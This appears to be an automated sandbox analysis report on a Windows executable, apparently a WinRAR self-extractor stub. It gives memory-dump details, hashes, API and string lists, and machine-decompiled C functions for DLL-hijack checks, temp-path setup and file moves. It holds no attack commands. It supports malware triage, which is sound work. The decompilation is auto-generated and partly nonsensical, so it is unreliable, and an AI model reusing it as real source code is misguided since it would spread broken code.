STARTDLG, xrefs: 0084A650
"%s"%s, xrefs: 0084AB67
__tmp_rar_sfx_access_check_%u, xrefs: 0084A90B
<, xrefs: 0084A9DE

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-1650746426
Opcode ID: 4afc9d456bd05dc15f195a4d37edc290169b368e176cca5f91897b9f7673e673
Instruction ID: a171b20f7d56504f16d8e0ee0c87724aab8b17d119a1b4965b7310faa8268fa5
Opcode Fuzzy Hash: 4afc9d456bd05dc15f195a4d37edc290169b368e176cca5f91897b9f7673e673
Instruction Fuzzy Hash: F842E571A8431CBEEB25AB64DC89FBE3B6CFB11700F054065F645EA1D1CBB58984CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0083FD60, Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 314
libraryfileloaderCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0083FD60(void* __edx, char _a3, long _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, CHAR* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
				char _v1;
				long _v4;
				char* _t118;
				void* _t126;
				int _t130;
				long _t141;
				int _t167;
				_Unknown_base(*)()* _t176;
				_Unknown_base(*)()* _t177;
				signed char _t184;
				struct _SECURITY_ATTRIBUTES* _t197;
				long _t199;
				void* _t200;
				struct HINSTANCE__* _t203;
				signed int _t205;
				signed int _t207;
				void* _t208;
				signed int _t209;
				int _t210;
				void* _t212;

				E0084D9C0();
				_push(_t209);
				_a3 = 0;
				_t203 = GetModuleHandleW(L"kernel32");
				if(_t203 == 0) {
					L5:
					_t118 =  *0x86d080; // 0x862884
					_t210 = _t209 | 0xffffffff;
					_t204 = 0x800;
					_a8 = L"version.dll";
					_a12 = L"DXGIDebug.dll";
					_a16 = L"sfc_os.dll";
					_a20 = L"SSPICLI.DLL";
					_a24 = L"rsaenh.dll";
					_a28 = L"UXTheme.dll";
					_a32 = L"dwmapi.dll";
					_a36 = L"cryptbase.dll";
					_a40 = L"lpk.dll";
					_a44 = L"usp10.dll";
					_a48 = L"clbcatq.dll";
					_a52 = L"comres.dll";
					_a56 = L"ws2_32.dll";
					_a60 = L"ws2help.dll";
					_a64 = L"psapi.dll";
					_a68 = L"ieframe.dll";
					_a72 = L"ntshrui.dll";
					_a76 = L"atl.dll";
					_a80 = L"setupapi.dll";
					_a84 = L"apphelp.dll";
					_a88 = L"userenv.dll";
					_a92 = L"netapi32.dll";
					_a96 = L"shdocvw.dll";
					_a100 = L"crypt32.dll";
					_a104 = L"msasn1.dll";
					_a108 = L"cryptui.dll";
					_a112 = L"wintrust.dll";
					_a116 = L"shell32.dll";
					_a120 = L"secur32.dll";
					_a124 = L"cabinet.dll";
					_a128 = L"oleaccrc.dll";
					_a132 = L"ntmarta.dll";
					_a136 = L"profapi.dll";
					_a140 = L"WindowsCodecs.dll";
					_a144 = L"srvcli.dll";
					_a148 = L"cscapi.dll";
					_a152 = L"slc.dll";
					_a156 = L"imageres.dll";
					_a160 = L"dnsapi.DLL";
					_a164 = L"iphlpapi.DLL";
					_a168 = L"WINNSI.DLL";
					_a172 = L"netutils.dll";
					_a176 = L"mpr.dll";
					_a180 = L"devrtl.dll";
					_a184 = L"propsys.dll";
					_a188 = L"mlang.dll";
					_a192 = L"samcli.dll";
					_a196 = L"samlib.dll";
					_a200 = L"wkscli.dll";
					_a204 = L"dfscli.dll";
					_a208 = L"browcli.dll";
					_a212 = L"rasadhlp.dll";
					_a216 = L"dhcpcsvc6.dll";
					_a220 = L"dhcpcsvc.dll";
					_a224 = L"XmlLite.dll";
					_a228 = L"linkinfo.dll";
					_a232 = L"cryptsp.dll";
					_a236 = L"RpcRtRemote.dll";
					_a240 = L"aclui.dll";
					_a244 = L"dsrole.dll";
					_a248 = L"peerdist.dll";
					if( *_t118 == 0x78) {
						L14:
						GetModuleFileNameW(0,  &_a772, _t204);
						E0083FAE7( &_a9160, E0083B9E0(_t225,  &_a772), _t204);
						_t197 = 0;
						_t205 = 0;
						do {
							if(E0083AA39() < 0x600) {
								_t126 = 0;
								__eflags = 0;
							} else {
								_t126 = E0083FD16( *((intOrPtr*)(_t212 + 0x18 + _t205 * 4))); // executed
							}
							if(_t126 == 0) {
								L20:
								_push(0x800);
								E0083BA56(_t229,  &_a772,  *((intOrPtr*)(_t212 + 0x1c + _t205 * 4)));
								_t130 = GetFileAttributesW( &_a760); // executed
								if(_t130 != _t210) {
									_t197 =  *((intOrPtr*)(_t212 + 0x18 + _t205 * 4));
									L24:
									if(_v1 != 0) {
										L30:
										_t236 = _t197;
										if(_t197 == 0) {
											return _t130;
										}
										E0083BA2A(_t236,  &_a768);
										if(E0083AA39() < 0x600) {
											_push( &_a9160);
											_push( &_a768);
											E00833F53( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t197);
											_t212 = _t212 + 0x18;
											_t130 = AllocConsole();
											__eflags = _t130;
											if(_t130 != 0) {
												__imp__AttachConsole(GetCurrentProcessId());
												_t141 = E00852B93( &_a4860);
												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t141,  &_v4, 0);
												Sleep(0x2710);
												_t130 = FreeConsole();
											}
										} else {
											E0083FD16(L"dwmapi.dll");
											E0083FD16(L"uxtheme.dll");
											_push( &_a9152);
											_push( &_a760);
											E00833F53( &_a4852, 0x864, E0083DA8B(0xf1), _t197);
											_t212 = _t212 + 0x18;
											_t130 = E008497A8(0,  &_a4848, E0083DA8B(0xf0), 0x30);
										}
										ExitProcess(0);
									}
									_t207 = 0;
									while(1) {
										_push(0x800);
										E0083BA56(0,  &_a768,  *((intOrPtr*)(_t212 + 0x3c + _t207 * 4)));
										_t130 = GetFileAttributesW( &_a756);
										if(_t130 != _t210) {
											break;
										}
										_t207 = _t207 + 1;
										if(_t207 < 0x35) {
											continue;
										}
										goto L30;
									}
									_t197 =  *((intOrPtr*)(_t212 + 0x38 + _t207 * 4));
									goto L30;
								}
							} else {
								_t130 = CompareStringW(0x400, 0x1001,  *(_t212 + 0x24 + _t205 * 4), _t210, L"DXGIDebug.dll", _t210); // executed
								_t229 = _t130 - 2;
								if(_t130 != 2) {
									goto L21;
								}
								goto L20;
							}
							L21:
							_t205 = _t205 + 1;
						} while (_t205 < 8);
						goto L24;
					}
					_t199 = E008566D8(_t185, _t118);
					if(_t199 == 0) {
						goto L14;
					}
					GetModuleFileNameW(0,  &_a4868, 0x800);
					_t208 = CreateFileW( &_a4868, 0x80000000, 1, 0, 3, 0, 0);
					if(_t208 == _t210 || SetFilePointer(_t208, _t199, 0, 0) != _t199) {
						L13:
						CloseHandle(_t208);
						_t204 = 0x800;
						goto L14;
					} else {
						_t167 = ReadFile(_t208,  &_a13260, 0x7ffe,  &_a4, 0);
						_t224 = _t167;
						if(_t167 == 0) {
							goto L13;
						}
						_push(0x104);
						 *((short*)(_t212 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
						_push( &_a252);
						_push( &_a13260);
						while(1) {
							_t200 = E0083F86B(_t224);
							_t225 = _t200;
							if(_t200 == 0) {
								goto L13;
							}
							E0083FD16( &_a252);
							_push(0x104);
							_push( &_a248);
							_push(_t200);
						}
						goto L13;
					}
				}
				_t176 = GetProcAddress(_t203, "SetDllDirectoryW");
				_t184 = _a46032;
				if(_t176 != 0) {
					asm("sbb ecx, ecx");
					_t185 =  ~(_t184 & 0x000000ff) & 0x008622e4;
					 *_t176( ~(_t184 & 0x000000ff) & 0x008622e4);
				}
				_t177 = GetProcAddress(_t203, "SetDefaultDllDirectories");
				if(_t177 != 0) {
					_t185 = ((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000;
					 *_t177(((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
					_v1 = 1;
				}
				goto L5;
			}

0x0083fd65
0x0083fd6b
0x0083fd73
0x0083fd7e
0x0083fd82
0x0083fdd5
0x0083fdd5
0x0083fdda
0x0083fde3
0x0083fde8
0x0083fdf0
0x0083fdfb
0x0083fe03
0x0083fe0b
0x0083fe13
0x0083fe1b
0x0083fe23
0x0083fe2b
0x0083fe33
0x0083fe3b
0x0083fe43
0x0083fe4b
0x0083fe53
0x0083fe5b
0x0083fe63
0x0083fe6b
0x0083fe73
0x0083fe7b
0x0083fe83
0x0083fe8b
0x0083fe93
0x0083fe9b
0x0083fea3
0x0083feab
0x0083feb3
0x0083febb
0x0083fec6
0x0083fed1
0x0083fedc
0x0083fee7
0x0083fef2
0x0083fefd
0x0083ff08
0x0083ff13
0x0083ff1e
0x0083ff29
0x0083ff34
0x0083ff3f
0x0083ff4a
0x0083ff55
0x0083ff60
0x0083ff6b
0x0083ff76
0x0083ff81
0x0083ff8c
0x0083ff97
0x0083ffa2
0x0083ffad
0x0083ffb8
0x0083ffc3
0x0083ffce
0x0083ffd9
0x0083ffe4
0x0083ffef
0x0083fffa
0x00840005
0x00840010
0x0084001b
0x00840026
0x00840031
0x0084003c
0x0084010a
0x00840115
0x0084012e
0x00840139
0x0084013b
0x0084013d
0x00840147
0x00840154
0x00840154
0x00840149
0x0084014d
0x0084014d
0x00840158
0x0084017a
0x0084017a
0x0084018b
0x00840198
0x0084019c
0x008401a6
0x008401aa
0x008401af
0x008401e3
0x008401e3
0x008401e5
0x008402fc
0x008402fc
0x008401f3
0x00840202
0x00840271
0x00840279
0x0084028d
0x00840292
0x00840295
0x0084029b
0x0084029d
0x008402a6
0x008402bb
0x008402d3
0x008402de
0x008402e4
0x008402e4
0x00840204
0x00840209
0x00840213
0x0084021f
0x00840227
0x00840241
0x00840246
0x00840260
0x00840260
0x008402ec
0x008402ec
0x008401b1
0x008401b3
0x008401b3
0x008401c4
0x008401d1
0x008401d5
0x00000000
0x00000000
0x008401d7
0x008401db
0x00000000
0x00000000
0x00000000
0x008401dd
0x008401df
0x00000000
0x008401df
0x0084015a
0x0084016f
0x00840175
0x00840178
0x00000000
0x00000000
0x00000000
0x00840178
0x0084019e
0x0084019e
0x0084019f
0x00000000
0x008401a4
0x00840048
0x0084004d
0x00000000
0x00000000
0x0084005e
0x0084007c
0x00840080
0x008400fe
0x008400ff
0x00840105
0x00000000
0x00840092
0x008400a7
0x008400ad
0x008400af
0x00000000
0x00000000
0x008400b9
0x008400be
0x008400cd
0x008400d5
0x008400f3
0x008400f8
0x008400fa
0x008400fc
0x00000000
0x00000000
0x008400e0
0x008400e5
0x008400f1
0x008400f2
0x008400f2
0x00000000
0x008400f3
0x00840080
0x0083fd90
0x0083fd92
0x0083fd9b
0x0083fda2
0x0083fda4
0x0083fdab
0x0083fdab
0x0083fdb3
0x0083fdb7
0x0083fdc7
0x0083fdce
0x0083fdd0
0x0083fdd0
0x00000000

APIs

GetModuleHandleW.KERNEL32 ref: 0083FD78
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0083FD90
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0083FDB3
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0084005E
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00840076
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00840088
ReadFile.KERNEL32(00000000,?,00007FFE,008628D4,00000000), ref: 008400A7
CloseHandle.KERNEL32(00000000), ref: 008400FF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00840115
CompareStringW.KERNELBASE(00000400,00001001,00862920,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 0084016F
GetFileAttributesW.KERNELBASE(?,?,008628EC,00000800,?,00000000,?,00000800), ref: 00840198
GetFileAttributesW.KERNEL32(?,?,008629AC,00000800), ref: 008401D1

Part of subcall function 0083FD16: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0083FD31
Part of subcall function 0083FD16: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0083E82C,Crypt32.dll,?,0083E8AE,?,0083E892,?,?,?,?), ref: 0083FD53

_swprintf.LIBCMT ref: 00840241
_swprintf.LIBCMT ref: 0084028D

Part of subcall function 00833F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00833F66

AllocConsole.KERNEL32 ref: 00840295
GetCurrentProcessId.KERNEL32 ref: 0084029F
AttachConsole.KERNEL32(00000000), ref: 008402A6
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 008402CC
WriteConsoleW.KERNEL32(00000000), ref: 008402D3
Sleep.KERNEL32(00002710), ref: 008402DE
FreeConsole.KERNEL32 ref: 008402E4
ExitProcess.KERNEL32 ref: 008402EC

Strings

kernel32, xrefs: 0083FD6E
SetDllDirectoryW, xrefs: 0083FD8A
uxtheme.dll, xrefs: 0084020E
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 0084027B
dwmapi.dll, xrefs: 0083FE1B, 00840204
DXGIDebug.dll, xrefs: 0083FDF0, 0084015B
SetDefaultDllDirectories, xrefs: 0083FDAD

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1201351596-3298887752
Opcode ID: 37c30dc6e4805e33b3a6ae9334ebf24a9a86f386b2130e6f215cc4d7e4e78dbb
Instruction ID: 07cd7c71456f4588babb9d76ea1f6bfac1d119362f24649ee8927e75ff917296
Opcode Fuzzy Hash: 37c30dc6e4805e33b3a6ae9334ebf24a9a86f386b2130e6f215cc4d7e4e78dbb
Instruction Fuzzy Hash: 49D162B1408B849AD335DF94C849B9FBBE8FB85344F52095DE389D6281CBB4854CCBA3

Uniqueness

Uniqueness Score: -1.00%

Function 0084B522, Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438
windowfileCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E0084B522(void* __ecx, void* __edx) {
				intOrPtr _t215;
				void* _t220;
				intOrPtr _t278;
				void* _t292;
				WCHAR* _t294;
				void* _t297;
				WCHAR* _t298;
				void* _t303;

				_t292 = __edx;
				E0084D8C4(E00861599, __ecx);
				_t215 = 0x1bc80;
				E0084D9C0();
				if( *((intOrPtr*)(_t303 + 0xc)) == 0) {
					L169:
					 *[fs:0x0] =  *((intOrPtr*)(_t303 - 0xc));
					return _t215;
				}
				_push(0x1000);
				_push(_t303 - 0xe);
				_push(_t303 - 0xd);
				_push(_t303 - 0x5c84);
				_push(_t303 - 0xfc8c);
				_push( *((intOrPtr*)(_t303 + 0xc)));
				_t215 = E0084A1C9();
				 *((intOrPtr*)(_t303 + 0xc)) = 0x1bc80;
				if(0x1bc80 != 0) {
					_t278 =  *((intOrPtr*)(_t303 + 0x10));
					do {
						_t220 = _t303 - 0x5c84;
						_t297 = _t303 - 0x1bc8c;
						_t294 = 6;
						goto L4;
						L6:
						while(E00841438(_t303 - 0xfc8c,  *((intOrPtr*)(0x86d618 + _t298 * 4))) != 0) {
							_t298 =  &(_t298[0]);
							if(_t298 < 0xe) {
								continue;
							} else {
								goto L167;
							}
						}
						if(_t298 > 0xd) {
							goto L167;
						}
						switch( *((intOrPtr*)(_t298 * 4 +  &M0084C132))) {
							case 0:
								__eflags = _t278 - 2;
								if(_t278 != 2) {
									goto L167;
								}
								_t300 = 0x800;
								E0084966B(_t303 - 0x7c84, 0x800);
								E0083A22C(E0083B6C2(_t303 - 0x7c84, _t303 - 0x5c84, _t303 - 0xdc8c, 0x800), _t278, _t303 - 0x8c8c, 0x800);
								 *(_t303 - 4) = _t294;
								E0083A366(_t303 - 0x8c8c, _t303 - 0xdc8c);
								E00836FEC(_t303 - 0x3c84);
								_push(_t294);
								_t287 = _t303 - 0x8c8c;
								_t238 = E0083A2B9(_t303 - 0x8c8c, _t292, _t303 - 0x3c84);
								__eflags = _t238;
								if(_t238 == 0) {
									L28:
									 *(_t303 - 4) =  *(_t303 - 4) | 0xffffffff;
									E0083A242(_t303 - 0x8c8c);
									goto L167;
								} else {
									goto L15;
									L16:
									E0083B254(_t287, __eflags, _t303 - 0x7c84, _t303 - 0x103c, _t300);
									E0083AF49(__eflags, _t303 - 0x103c, _t300);
									_t302 = E00852B93(_t303 - 0x7c84);
									__eflags = _t302 - 4;
									if(_t302 < 4) {
										L18:
										_t266 = E0083B682(_t303 - 0x5c84);
										__eflags = _t266;
										if(_t266 != 0) {
											goto L28;
										}
										L19:
										_t268 = E00852B93(_t303 - 0x3c84);
										__eflags = 0;
										 *((short*)(_t303 + _t268 * 2 - 0x3c82)) = 0;
										E0084E920(_t294, _t303 - 0x3c, _t294, 0x1e);
										_t305 = _t305 + 0x10;
										 *((intOrPtr*)(_t303 - 0x38)) = 3;
										_push(0x14);
										_pop(_t271);
										 *((short*)(_t303 - 0x2c)) = _t271;
										 *((intOrPtr*)(_t303 - 0x34)) = _t303 - 0x3c84;
										_push(_t303 - 0x3c);
										 *0x86def4();
										goto L20;
									}
									_t276 = E00852B93(_t303 - 0x103c);
									__eflags = _t302 - _t276;
									if(_t302 > _t276) {
										goto L19;
									}
									goto L18;
									L20:
									_t243 = GetFileAttributesW(_t303 - 0x3c84);
									__eflags = _t243 - 0xffffffff;
									if(_t243 == 0xffffffff) {
										L27:
										_push(_t294);
										_t287 = _t303 - 0x8c8c;
										_t245 = E0083A2B9(_t303 - 0x8c8c, _t292, _t303 - 0x3c84);
										__eflags = _t245;
										if(_t245 != 0) {
											_t300 = 0x800;
											L15:
											SetFileAttributesW(_t303 - 0x3c84, _t294);
											__eflags =  *((char*)(_t303 - 0x2c78));
											if(__eflags == 0) {
												goto L20;
											}
											goto L16;
										}
										goto L28;
									}
									_t247 = DeleteFileW(_t303 - 0x3c84);
									__eflags = _t247;
									if(_t247 != 0) {
										goto L27;
									} else {
										_t301 = _t294;
										_push(_t294);
										goto L24;
										L24:
										E00833F53(_t303 - 0x103c, 0x800, L"%s.%d.tmp", _t303 - 0x3c84);
										_t305 = _t305 + 0x14;
										_t252 = GetFileAttributesW(_t303 - 0x103c);
										__eflags = _t252 - 0xffffffff;
										if(_t252 != 0xffffffff) {
											_t301 = _t301 + 1;
											__eflags = _t301;
											_push(_t301);
											goto L24;
										} else {
											_t255 = MoveFileW(_t303 - 0x3c84, _t303 - 0x103c);
											__eflags = _t255;
											if(_t255 != 0) {
												MoveFileExW(_t303 - 0x103c, _t294, 4);
											}
											goto L27;
										}
									}
								}
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax = E00852B93(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0x88ce0c);
									__eax = E00852BBE(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
										 *0x88ce0c = __eax;
										__eflags = __bl;
										if(__bl != 0) {
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
										}
										__eax = E00856763(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags = __bh;
									if(__bh == 0) {
										__eax = L00852BAE(__esi);
									}
								}
								goto L167;
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
								}
								goto L167;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L167;
								}
								__eflags =  *0x879602 - __di;
								if( *0x879602 != __di) {
									goto L167;
								}
								__eax = 0;
								__edi = __ebp - 0x5c84;
								_push(0x22);
								 *(__ebp - 0x103c) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x5c84) - __ax;
								if( *(__ebp - 0x5c84) == __ax) {
									__edi = __ebp - 0x5c82;
								}
								__eax = E00852B93(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L167;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										L54:
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L66:
											__ebp - 0x103c = E0083FAE7(__ebp - 0x103c, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L67:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x103c;
											__eax = E00850D9B(__ebp - 0x103c, __ebp - 0x103c);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
												if( *((intOrPtr*)(__eax + 2)) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x103c;
											__edi = 0x879602;
											E0083FAE7(0x879602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
											__eax = E0084A06F(__ebp - 0x103c, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
											__ebx =  *0x86df7c;
											__eax = SendMessageW(__esi, 0x143, __ebx, 0x879602); // executed
											__eax = __ebp - 0x103c;
											__eax = E00852BC9(__ebp - 0x103c, 0x879602, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x103c = 0;
												__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
											}
											goto L167;
										}
										__eflags = __ax;
										if(__ax == 0) {
											L57:
											__eax = __ebp - 0x18;
											__ebx = 0;
											_push(__ebp - 0x18);
											_push(1);
											_push(0);
											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
											_push(0x80000002);
											__eax =  *0x86dea8();
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												_push(__ebp - 0x14);
												__eax = __ebp - 0x103c;
												_push(__ebp - 0x103c);
												__eax = __ebp - 0x1c;
												_push(__ebp - 0x1c);
												_push(0);
												_push(L"ProgramFilesDir");
												_push( *(__ebp - 0x18));
												__eax =  *0x86dea4();
												_push( *(__ebp - 0x18));
												 *0x86de84() =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x103c) = __cx;
											}
											__eflags =  *(__ebp - 0x103c) - __bx;
											if( *(__ebp - 0x103c) != __bx) {
												__eax = __ebp - 0x103c;
												__eax = E00852B93(__ebp - 0x103c);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x103c = E0083FABF(__eflags, __ebp - 0x103c, 0x86258c, __esi);
												}
											}
											__esi = E00852B93(__edi);
											__eax = __ebp - 0x103c;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x103c = E0083FABF(__eflags, __ebp - 0x103c, __edi, 0x800);
											}
											goto L67;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L66;
										}
										goto L57;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L54;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L167;
									} else {
										__ebp - 0x103c = E0083FAE7(__ebp - 0x103c, __edi, 0x800);
										goto L67;
									}
								}
							case 4:
								__eflags =  *0x8795fc - 1;
								__eflags = __eax - 0x8795fc;
								 *__edi =  *__edi + __ecx;
								__eflags =  *(__ebx + 6) & __bl;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L84:
									 *0x8775cf = __cl;
									 *0x8775f0 = 1;
									goto L167;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0x8775cf = __cl;
									L83:
									 *0x8775f0 = __cl;
									goto L167;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L84;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L167;
								}
								 *0x8775cf = 1;
								goto L83;
							case 6:
								__eflags = __ebx - 4;
								if(__ebx != 4) {
									goto L94;
								}
								__eax = __ebp - 0x5c84;
								__eax = E00852BC9(__ebp - 0x5c84, __eax, L"<>");
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L94;
								}
								_push(__edi);
								goto L93;
							case 7:
								__eflags = __ebx - 1;
								if(__eflags != 0) {
									L115:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										__eflags =  *0x8795fc;
										if( *0x8795fc == 0) {
											 *0x8795fc = 2;
										}
										 *0x8785f8 = 1;
									}
									goto L167;
								}
								__eax = __ebp - 0x7c84;
								__edi = 0x800;
								GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
								E0083AF49(__eflags, __ebp - 0x7c84, 0x800) = 0;
								__esi = 0;
								_push(0);
								while(1) {
									_push( *0x86d5f8);
									__ebp - 0x7c84 = E00833F53(0x8785fa, __edi, L"%s%s%u", __ebp - 0x7c84);
									__eax = E00839F0F(0x8785fa);
									__eflags = __al;
									if(__al == 0) {
										break;
									}
									__esi =  &(__esi->i);
									__eflags = __esi;
									_push(__esi);
								}
								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x8785fa);
								__eflags =  *(__ebp - 0x5c84);
								if( *(__ebp - 0x5c84) == 0) {
									goto L167;
								}
								__eflags =  *0x885d02;
								if( *0x885d02 != 0) {
									goto L167;
								}
								__eax = 0;
								 *(__ebp - 0x143c) = __ax;
								__eax = __ebp - 0x5c84;
								_push(0x2c);
								_push(__ebp - 0x5c84);
								__eax = E00850BB8(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									L111:
									__eflags =  *(__ebp - 0x143c);
									if( *(__ebp - 0x143c) == 0) {
										__ebp - 0x1bc8c = __ebp - 0x5c84;
										E0083FAE7(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
										__ebp - 0x143c = E0083FAE7(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
									}
									__ebp - 0x5c84 = E00849CC2(__ebp - 0x5c84);
									__eax = 0;
									 *(__ebp - 0x4c84) = __ax;
									__ebp - 0x143c = __ebp - 0x5c84;
									__eax = E008497A8( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
									__eflags = __eax - 6;
									if(__eax == 6) {
										goto L167;
									} else {
										__eax = 0;
										__eflags = 0;
										 *0x8775cc = 1;
										 *0x8785fa = __ax;
